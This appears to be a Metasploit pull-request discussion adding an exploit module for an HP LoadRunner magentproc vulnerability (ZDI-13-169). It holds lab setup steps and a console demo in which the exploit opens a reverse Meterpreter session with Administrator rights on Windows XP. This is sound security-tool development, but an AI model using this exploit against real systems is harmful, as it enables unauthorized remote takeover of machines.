Add module for ZDI-13-169

[jvazquez-r7]

Tested successfully on HP LoadRunner 11.50 / Windows XP SP3. I have not been able to exploit reliably on other Windows versions due to memory protections. Maybe someone would like to give a chance. Windows XP SP3 is still a supported platform for HP LoadRunner. Maybe still could be possible to exploit on other platforms, but I don't spot how to make it reliable. And don't want the reversing time invested to get the vulnerability so here it is.

Verification

• Install Windows XP SP3
• Install Windows HP LoadRunner 11.50. Can be downloaded from https://h20575.www2.hp.com/evalportal/displayProductsList.do?prdcenter=HPSS_PC&lang=en&cc=us&hpappid=PDAPI_PRMO_PRO2_EVAL&applandingpage2=HTTPS://h20575.www2.hp.com/evalportal/displayProductsList.do?prdcenter=HPSS_PC&hppev_userid=hp_sec&hpp_r_m=false
• Verify the version of magentproc.exe (the vulnerable service), should be 11.50.2042.0, if it isn't ask me for the HP LoadRunner installer
• Run the "Agent Process". It is accessible from the Start Menu.
• Run msfconsole and run the exploit against the target, hopefully get a session :)

See the demo:

msf > use exploit/windows/misc/hp_loadrunner_magentproc 
rexploitmsf exploit(hp_loadrunner_magentproc) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Sending malicious request...
[*] Sending stage (770048 bytes) to 192.168.172.244
[*] Meterpreter session 2 opened (192.168.172.1:4444 -> 192.168.172.244:1033) at 2013-10-03 22:15:02 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > sysinfo
eComputer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > exit -y
[*] Shutting down Meterpreter...

[*] 192.168.172.244 - Meterpreter session 2 closed.  Reason: User exit

[wchen-r7]

I'll handle this tomorrow. Been working on my dynamic rop payload size branch....

[jvazquez-r7]

no rush!